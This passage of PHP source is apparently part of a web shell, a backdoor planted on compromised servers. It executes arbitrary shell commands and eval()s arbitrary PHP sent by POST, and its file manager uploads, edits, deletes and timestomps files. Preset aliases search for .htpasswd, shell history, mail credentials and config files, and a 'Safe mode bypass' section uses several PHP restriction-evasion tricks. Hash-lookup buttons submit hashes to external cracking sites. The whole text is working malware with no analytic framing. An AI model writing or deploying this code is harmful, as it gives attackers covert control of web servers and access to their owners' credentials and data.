  showSecParam('Account Settings', iconv('CP866', 'UTF-8',ex('net accounts')));
  showSecParam('User Accounts', iconv('CP866', 'UTF-8',ex('net user')));
 }
 echo '</div>';
 hardFooter();
}
function actionFilesTools() {
 if( isset($_POST['p1']) )
  $_POST['p1'] = urldecode($_POST['p1']);
 if(@$_POST['p2']=='download') {
  if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) {
   ob_start("ob_gzhandler", 4096);
   header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
   if (function_exists("mime_content_type")) {
    $type = @mime_content_type($_POST['p1']);
    header("Content-Type: " . $type);
   } else
                header("Content-Type: application/octet-stream");
   $fp = @fopen($_POST['p1'], "r");
   if($fp) {
    while(!@feof($fp))
      echo @fread($fp, 1024);
    fclose($fp);
   }
  }exit;
 }
 if( @$_POST['p2'] == 'mkfile' ) {
  if(!file_exists($_POST['p1'])) {
   $fp = @fopen($_POST['p1'], 'w');
   if($fp) {
    $_POST['p2'] = "edit";
    fclose($fp);
   }
  }
 }
 hardHeader();
 echo '<h1>File tools</h1><div class=content>';
 if( !file_exists(@$_POST['p1']) ) {
  echo 'File not exists';
  hardFooter();
  return;
 }
 $uid = @posix_getpwuid(@fileowner($_POST['p1']));
 if(!$uid) {
  $uid['name'] = @fileowner($_POST['p1']);
  $gid['name'] = @filegroup($_POST['p1']);
 } else $gid = @posix_getgrgid(@filegroup($_POST['p1']));
 echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).' <span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
 echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
 if( empty($_POST['p2']) )
  $_POST['p2'] = 'view';
 if( is_file($_POST['p1']) )
  $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
 else
  $m = array('Chmod', 'Rename', 'Touch');
 foreach($m as $v)
  echo '<a href=# onclick="g(null,null,\'' . urlencode($_POST['p1']) . '\',\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
 echo '<br><br>';
 switch($_POST['p2']) {
  case 'view':
   echo '<pre class=ml1>';
   $fp = @fopen($_POST['p1'], 'r');
   if($fp) {
    while( !@feof($fp) )
      echo htmlspecialchars(@fread($fp, 1024));
    @fclose($fp);
   }
   echo '</pre>';
   break;
  case 'highlight':
   if( @is_readable($_POST['p1']) ) {
    echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
    $code = @highlight_file($_POST['p1'],true);
    echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
   }
   break;
  case 'chmod':
   if( !empty($_POST['p3']) ) {
    $perms = 0;
    for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
      $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
    if(!@chmod($_POST['p1'], $perms))
      echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
   }
   clearstatcache();
   echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';
   break;
  case 'edit':
   if( !is_writable($_POST['p1'])) {
    echo 'File isn\'t writeable';
    break;
   }
   if( !empty($_POST['p3']) ) {
    $time = @filemtime($_POST['p1']);
    $_POST['p3'] = substr($_POST['p3'],1);
    $fp = @fopen($_POST['p1'],"w");
    if($fp) {
      @fwrite($fp,$_POST['p3']);
      @fclose($fp);
      echo 'Saved!<br><script>p3_="";</script>';
      @touch($_POST['p1'],$time,$time);
    }
   }
   echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>';
   $fp = @fopen($_POST['p1'], 'r');
   if($fp) {
    while( !@feof($fp) )
      echo htmlspecialchars(@fread($fp, 1024));
    @fclose($fp);
   }
   echo '</textarea><input type=submit value=">>"></form>';
   break;
  case 'hexdump':
   $c = @file_get_contents($_POST['p1']);
   $n = 0;
   $h = array('00000000<br>','','');
   $len = strlen($c);
   for ($i=0; $i<$len; ++$i) {
    $h[1] .= sprintf('%02X',ord($c[$i])).' ';
    switch ( ord($c[$i]) ) {
      case 0:  $h[2] .= ' '; break;
      case 9:  $h[2] .= ' '; break;
      case 10: $h[2] .= ' '; break;
      case 13: $h[2] .= ' '; break;
      default: $h[2] .= $c[$i]; break;
    }
    $n++;
    if ($n == 32) {
      $n = 0;
      if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
      $h[1] .= '<br>';
      $h[2] .= "\n";
    }
    }
   echo '<table cellspacing=1 cellpadding=5 bgcolor=#222><tr><td bgcolor=#1e252e><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#060a10><pre>'.$h[1].'</pre></td><td bgcolor=#1e252e><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
   break;
  case 'rename':
   if( !empty($_POST['p3']) ) {
    if(!@rename($_POST['p1'], $_POST['p3']))
      echo 'Can\'t rename!<br>';
    else
      die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
   }
   echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';
   break;
  case 'touch':
   if( !empty($_POST['p3']) ) {
    $time = strtotime($_POST['p3']);
    if($time) {
      if(!touch($_POST['p1'],$time,$time))
       echo 'Fail!';
      else
       echo 'Touched!';
    } else echo 'Bad time format!';
   }
   clearstatcache();
   echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>';
   break;
 }
 echo '</div>';
 hardFooter();
}
if($os == 'win')
 $aliases = array(
  "List Directory" => "dir",
      "Find index.php in current dir" => "dir /s /w /b index.php",
      "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
      "Show active connections" => "netstat -an",
      "Show running services" => "net start",
      "User accounts" => "net user",
      "Show computers" => "net view",
  "ARP Table" => "arp -a",
  "IP Configuration" => "ipconfig /all"
 );
else
 $aliases = array(
    "List dir" => "ls -lha",
  "list file attributes on a Linux second extended file system" => "lsattr -va",
    "show opened ports" => "netstat -an | grep -i listen",
        "process status" => "ps aux",
  "Find" => "",
    "find all suid files" => "find / -type f -perm -04000 -ls",
    "find suid files in current dir" => "find . -type f -perm -04000 -ls",
    "find all sgid files" => "find / -type f -perm -02000 -ls",
    "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
    "find config.inc.php files" => "find / -type f -name config.inc.php",
    "find config* files" => "find / -type f -name \"config*\"",
    "find config* files in current dir" => "find . -type f -name \"config*\"",
    "find all writable folders and files" => "find / -perm -2 -ls",
    "find all writable folders and files in current dir" => "find . -perm -2 -ls",
    "find all service.pwd files" => "find / -type f -name service.pwd",
    "find service.pwd files in current dir" => "find . -type f -name service.pwd",
    "find all .htpasswd files" => "find / -type f -name .htpasswd",
    "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
    "find all .bash_history files" => "find / -type f -name .bash_history",
    "find .bash_history files in current dir" => "find . -type f -name .bash_history",
    "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
    "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
  "Locate" => "",
    "locate httpd.conf files" => "locate httpd.conf",
  "locate vhosts.conf files" => "locate vhosts.conf",
  "locate proftpd.conf files" => "locate proftpd.conf",
  "locate psybnc.conf files" => "locate psybnc.conf",
  "locate my.conf files" => "locate my.conf",
  "locate admin.php files" =>"locate admin.php",
  "locate cfg.php files" => "locate cfg.php",
  "locate conf.php files" => "locate conf.php",
  "locate config.dat files" => "locate config.dat",
  "locate config.php files" => "locate config.php",
  "locate config.inc files" => "locate config.inc",
  "locate config.inc.php" => "locate config.inc.php",
  "locate config.default.php files" => "locate config.default.php",
  "locate config* files " => "locate config",
  "locate .conf files"=>"locate '.conf'",
  "locate .pwd files" => "locate '.pwd'",
  "locate .sql files" => "locate '.sql'",
  "locate .htpasswd files" => "locate '.htpasswd'",
  "locate .bash_history files" => "locate '.bash_history'",
  "locate .mysql_history files" => "locate '.mysql_history'",
  "locate .fetchmailrc files" => "locate '.fetchmailrc'",
  "locate backup files" => "locate backup",
  "locate dump files" => "locate dump",
  "locate priv files" => "locate priv"
 );
function actionConsole() {
    if(!empty($_POST['p1']) && !empty($_POST['p2'])) {
        prototype(md5($_SERVER['HTTP_HOST']).'stderr_to_out', true);
        $_POST['p1'] .= ' 2>&1';
    } elseif(!empty($_POST['p1']))
        prototype(md5($_SERVER['HTTP_HOST']).'stderr_to_out', 0);
 if(isset($_POST['ajax'])) {
  prototype(md5($_SERVER['HTTP_HOST']).'ajax', true);
  ob_start();
  echo "d.cf.cmd.value='';\n";
  $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\'\0"));
  if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) {
   if(@chdir($match[1])) {
    $GLOBALS['cwd'] = @getcwd();
    echo "c_='".$GLOBALS['cwd']."';";
   }
  }
  echo "d.cf.output.value+='".$temp."';";
  echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";
  $temp = ob_get_clean();
  echo strlen($temp), "\n", $temp;
  exit;
 }
    if(empty($_POST['ajax'])&&!empty($_POST['p1']))
  prototype(md5($_SERVER['HTTP_HOST']).'ajax', 0);
 hardHeader();
    echo "<script>
if(window.Event) window.captureEvents(Event.KEYDOWN);
var cmds = new Array('');
var cur = 0;
function kp(e) {
 var n = (window.Event) ? e.which : e.keyCode;
 if(n == 38) {
  cur--;
  if(cur>=0)
   document.cf.cmd.value = cmds[cur];
  else
   cur++;
 } else if(n == 40) {
  cur++;
  if(cur < cmds.length)
   document.cf.cmd.value = cmds[cur];
  else
   cur--;
 }
}
function add(cmd) {
 cmds.pop();
 cmds.push(cmd);
 cmds.push('');
 cur = cmds.length-1;
}
</script>";
 echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><select name=alias>';
 foreach($GLOBALS['aliases'] as $n => $v) {
  if($v == '') {
   echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
   continue;
  }
  echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
 }
 
 echo '</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 '.(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty($_POST['p2'])||$_COOKIE[md5($_SERVER['HTTP_HOST']).'stderr_to_out']?'checked':'').'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
 if(!empty($_POST['p1'])) {
  echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1']));
 }
 echo '</textarea><table style="border:1px solid #060a10;background-color:#060a10;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td style="padding-left:4px; width:13px;">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>';
 echo '</form></div><script>d.cf.cmd.focus();</script>';
 hardFooter();
}
function actionPhp() {
 if( isset($_POST['ajax']) ) {
  $_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
  ob_start();
  eval($_POST['p1']);
  $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
  echo strlen($temp), "\n", $temp;
  exit;
 }
 hardHeader();
 if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) {
  echo '<h1>PHP info</h1><div class=content>';
  ob_start();
  phpinfo();
  $tmp = ob_get_clean();
  $tmp = preg_replace('!body {.*}!msiU','',$tmp);
  $tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp);
  $tmp = preg_replace('!h1!msiU','h2',$tmp);
  $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
  $tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp);
  echo $tmp;
  echo '</div><br>';
 }
 if(empty($_POST['ajax'])&&!empty($_POST['p1']))
  $_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
  echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">';
 echo ' <input type=checkbox name=ajax value=1 '.($_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
 if(!empty($_POST['p1'])) {
  ob_start();
  eval($_POST['p1']);
  echo htmlspecialchars(ob_get_clean());
 }
 echo '</pre></div>';
 hardFooter();
}
function actionFilesMan() {
    if (!empty ($_COOKIE['f']))
        $_COOKIE['f'] = @unserialize($_COOKIE['f']);
 
 if(!empty($_POST['p1'])) {
  switch($_POST['p1']) {
   case 'uploadFile':
    if ( is_array($_FILES['f']['tmp_name']) ) {
      foreach ( $_FILES['f']['tmp_name'] as $i => $tmpName ) {
                        if(!@move_uploaded_file($tmpName, $_FILES['f']['name'][$i])) {
                                echo "Can't upload file!";
        }
       }
      }
    break;
   case 'mkdir':
    if(!@mkdir($_POST['p2']))
      echo "Can't create new dir";
    break;
   case 'delete':
    function deleteDir($path) {
      $path = (substr($path,-1)=='/') ? $path:$path.'/';
      $dh  = opendir($path);
      while ( ($â = readdir($dh) ) !== false) {
       $â = $path.$â;
       if ( (basename($â) == "..") || (basename($â) == ".") )
        continue;
       $type = filetype($â);
       if ($type == "dir")
        deleteDir($â);
       else
        @unlink($â);
      }
      closedir($dh);
      @rmdir($path);
    }
    if(is_array(@$_POST['f']))
      foreach($_POST['f'] as $f) {
                        if($f == '..')
                            continue;
       $f = urldecode($f);
       if(is_dir($f))
        deleteDir($f);
       else
        @unlink($f);
      }
    break;
   case 'paste':
    if($_COOKIE['act'] == 'copy') {
      function copy_paste($c,$s,$d){
       if(is_dir($c.$s)){
        mkdir($d.$s);
        $h = @opendir($c.$s);
        while (($f = @readdir($h)) !== false)
          if (($f != ".") and ($f != ".."))
           copy_paste($c.$s.'/',$f, $d.$s.'/');
       } elseif(is_file($c.$s))
        @copy($c.$s, $d.$s);
      }
      foreach($_COOKIE['f'] as $f)
       copy_paste($_COOKIE['c'],$f, $GLOBALS['cwd']);
    } elseif($_COOKIE['act'] == 'move') {
      function move_paste($c,$s,$d){
       if(is_dir($c.$s)){
        mkdir($d.$s);
        $h = @opendir($c.$s);
        while (($f = @readdir($h)) !== false)
          if (($f != ".") and ($f != ".."))
           copy_paste($c.$s.'/',$f, $d.$s.'/');
       } elseif(@is_file($c.$s))
        @copy($c.$s, $d.$s);
      }
      foreach($_COOKIE['f'] as $f)
       @rename($_COOKIE['c'].$f, $GLOBALS['cwd'].$f);
    } elseif($_COOKIE['act'] == 'zip') {
      if(class_exists('ZipArchive')) {
                        $zip = new ZipArchive();
                        if ($zip->open($_POST['p2'], 1)) {
                            chdir($_COOKIE['c']);
                            foreach($_COOKIE['f'] as $f) {
                                if($f == '..')
                                    continue;
                                if(@is_file($_COOKIE['c'].$f))
                                    $zip->addFile($_COOKIE['c'].$f, $f);
                                elseif(@is_dir($_COOKIE['c'].$f)) {
                                    $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/', FilesystemIterator::SKIP_DOTS));
                                    foreach ($iterator as $key=>$value) {
                                        $zip->addFile(realpath($key), $key);
                                    }
                                }
                            }
                            chdir($GLOBALS['cwd']);
                            $zip->close();
                        }
                    }
    } elseif($_COOKIE['act'] == 'unzip') {
      if(class_exists('ZipArchive')) {
                        $zip = new ZipArchive();
                        foreach($_COOKIE['f'] as $f) {
                            if($zip->open($_COOKIE['c'].$f)) {
                                $zip->extractTo($GLOBALS['cwd']);
                                $zip->close();
                            }
                        }
                    }
    } elseif($_COOKIE['act'] == 'tar') {
                    chdir($_COOKIE['c']);
                    $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']);
                    ex('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f']));
                    chdir($GLOBALS['cwd']);
    }
    unset($_COOKIE['f']);
                setcookie('f', '', time() - 3600);
    break;
   default:
                if(!empty($_POST['p1'])) {
      prototype('act', $_POST['p1']);
      prototype('f', serialize(@$_POST['f']));
      prototype('c', @$_POST['c']);
    }
    break;
  }
 }
    hardHeader();
 echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>';
 $dirContent = hardScandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
 if($dirContent === false) { echo 'Can\'t open this folder!';hardFooter(); return; }
 global $sort;
 $sort = array('name', 1);
 if(!empty($_POST['p1'])) {
  if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
   $sort = array($match[1], (int)$match[2]);
 }
echo "<script>
 function sa() {
  for(i=0;i<d.files.elements.length;i++)
   if(d.files.elements[i].type == 'checkbox')
    d.files.elements[i].checked = d.files.elements[0].checked;
 }
</script>
<table width='100%' class='main' cellspacing='0' cellpadding='2'>
<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";
 $dirs = $files = array();
 $n = count($dirContent);
 for($i=0;$i<$n;$i++) {
  $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
  $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
  $tmp = array('name' => $dirContent[$i],
       'path' => $GLOBALS['cwd'].$dirContent[$i],
       'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])),
       'perms' => viewPermsColor($GLOBALS['cwd'] . $dirContent[$i]),
       'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
       'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
       'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
      );
  if(@is_file($GLOBALS['cwd'] . $dirContent[$i]))
   $files[] = array_merge($tmp, array('type' => 'file'));
  elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i]))
   $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
  elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i]))
   $dirs[] = array_merge($tmp, array('type' => 'dir'));
 }
 $GLOBALS['sort'] = $sort;
 function cmp($a, $b) {
  if($GLOBALS['sort'][0] != 'size')
   return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);
  else
   return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
 }
 usort($files, "cmp");
 usort($dirs, "cmp");
 $files = array_merge($dirs, $files);
 $l = 0;
 foreach($files as $f) {
  echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" ' . (empty ($f['link']) ? '' : "title='{$f['link']}'") . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
   .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
  $l = $l?0:1;
 }
 echo "<tr><td colspan=7>
 <input type=hidden name=ne value=''>
 <input type=hidden name=a value='FilesMan'>
 <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'>
 <input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'>
 <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>";
    if(class_exists('ZipArchive'))
        echo "<option value='zip'>+ zip</option><option value='unzip'>- zip</option>";
    echo "<option value='tar'>+ tar.gz</option>";
    if(!empty($_COOKIE['act']) && @count($_COOKIE['f']))
        echo "<option value='paste'>â³ Paste</option>";
    echo "</select>&nbsp;";
    if(!empty($_COOKIE['act']) && @count($_COOKIE['f']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar')))
        echo "file name: <input type=text name=p2 value='hard_" . date("Ymd_His") . "." . ($_COOKIE['act'] == 'zip'?'zip':'tar.gz') . "'>&nbsp;";
    echo "<input type='submit' value='>>'></td></tr></form></table></div>";
 hardFooter();
}
function actionStringTools() {
 if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
    if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}}
 if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
 if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= sprintf('%02X',ord($p[$i]));return strtoupper($r);}}
 if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
 $stringTools = array(
  'Base64 encode' => 'base64_encode',
  'Base64 decode' => 'base64_decode',
  'Url encode' => 'urlencode',
  'Url decode' => 'urldecode',
  'Full urlencode' => 'full_urlencode',
  'md5 hash' => 'md5',
  'sha1 hash' => 'sha1',
  'crypt' => 'crypt',
  'CRC32' => 'crc32',
  'ASCII to HEX' => 'ascii2hex',
  'HEX to ASCII' => 'hex2ascii',
  'HEX to DEC' => 'hexdec',
  'HEX to BIN' => 'hex2bin',
  'DEC to HEX' => 'dechex',
  'DEC to BIN' => 'decbin',
  'BIN to HEX' => 'binhex',
  'BIN to DEC' => 'bindec',
  'String to lower case' => 'strtolower',
  'String to upper case' => 'strtoupper',
  'Htmlspecialchars' => 'htmlspecialchars',
  'String length' => 'strlen',
 );
 if(isset($_POST['ajax'])) {
  prototype(md5($_SERVER['HTTP_HOST']).'ajax', true);
  ob_start();
  if(in_array($_POST['p1'], $stringTools))
   echo $_POST['p1']($_POST['p2']);
  $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
  echo strlen($temp), "\n", $temp;
  exit;
 }
    if(empty($_POST['ajax'])&&!empty($_POST['p1']))
  prototype(md5($_SERVER['HTTP_HOST']).'ajax', 0);
 hardHeader();
 echo '<h1>String conversions</h1><div class=content>';
 echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
 foreach($stringTools as $k => $v)
  echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
  echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".(empty($_POST['p1'])?'':htmlspecialchars(@$_POST['p2']))."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
 if(!empty($_POST['p1'])) {
  if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));
 }
 echo"</pre></div><br><h1>Search files:</h1><div class=content>
  <form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'>
   <tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>
   <tr><td>Path:</td><td><input type='text' name='cwd' value='". htmlspecialchars($GLOBALS['cwd']) ."' style='width:100%'></td></tr>
   <tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>
   <tr><td></td><td><input type='submit' value='>>'></td></tr>
   </table></form>";
 function hardRecursiveGlob($path) {
  if(substr($path, -1) != '/')
   $path.='/';
  $paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR)));
  if(is_array($paths)&&@count($paths)) {
   foreach($paths as $â) {
    if(@is_dir($â)){
      if($path!=$â)
       hardRecursiveGlob($â);
    } else {
      if(empty($_POST['p2']) || @strpos(file_get_contents($â), $_POST['p2'])!==false)
       echo "<a href='#' onclick='g(\"FilesTools\",null,\"".urlencode($â)."\", \"view\",\"\")'>".htmlspecialchars($â)."</a><br>";
    }
   }
  }
 }
 if(@$_POST['p3'])
  hardRecursiveGlob($_POST['c']);
 echo "</div><br><h1>Search for hash:</h1><div class=content>
  <form method='post' target='_blank' name='hf'>
   <input type='text' name='hash' style='width:200px;'><br>
            <input type='hidden' name='act' value='find'/>
   <input type='button' value='hashcracking.ru' onclick=\"document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()\"><br>
   <input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br>
            <input type='button' value='fakenamegenerator.com' onclick=\"document.hf.action='http://www.fakenamegenerator.com/';document.hf.submit()\"><br>
   <input type='button' value='hashcrack.com' onclick=\"document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()\"><br>
   <input type='button' value='tools4noobs.com' onclick=\"document.hf.action='http://www.tools4noobs.com/online_php_functions/';document.hf.submit()\"><br>
   <input type='button' value='md5decrypter.com' onclick=\"document.hf.action='http://www.md5decrypter.com/';document.hf.submit()\"><br>
   <input type='button' value='artlebedev.ru' onclick=\"document.hf.action='https://www.artlebedev.ru/tools/decoder/';document.hf.submit()\"><br>
  </form></div>";
 hardFooter();
}
function actionSafeMode() {
 $temp='';
 ob_start();
 switch($_POST['p1']) {
  case 1:
   $temp=@tempnam($test, 'cx');
   if(@copy("compress.zlib://".$_POST['p2'], $temp)){
    echo @file_get_contents($temp);
    unlink($temp);
   } else
    echo 'Sorry... Can\'t open file';
   break;
  case 2:
   $files = glob($_POST['p2'].'*');
   if( is_array($files) )
    foreach ($files as $filename)
      echo $filename."\n";
   break;
  case 3:
   $ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH);
   curl_exec($ch);
   break;
  case 4:
   ini_restore("safe_mode");
   ini_restore("open_basedir");
   include($_POST['p2']);
   break;
  case 5:
   for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
    $uid = @posix_getpwuid($_POST['p2']);
    if ($uid)
      echo join(':',$uid)."\n";
   }
   break;
  case 6:
   if(!function_exists('imap_open'))break;
   $stream = imap_open($_POST['p2'], "", "");
   if ($stream == FALSE)
    break;
   echo imap_body($stream, 1);
   imap_close($stream);
   break;
 }
 $temp = ob_get_clean();
 hardHeader();
 echo '<h1>Safe mode bypass</h1><div class=content>';
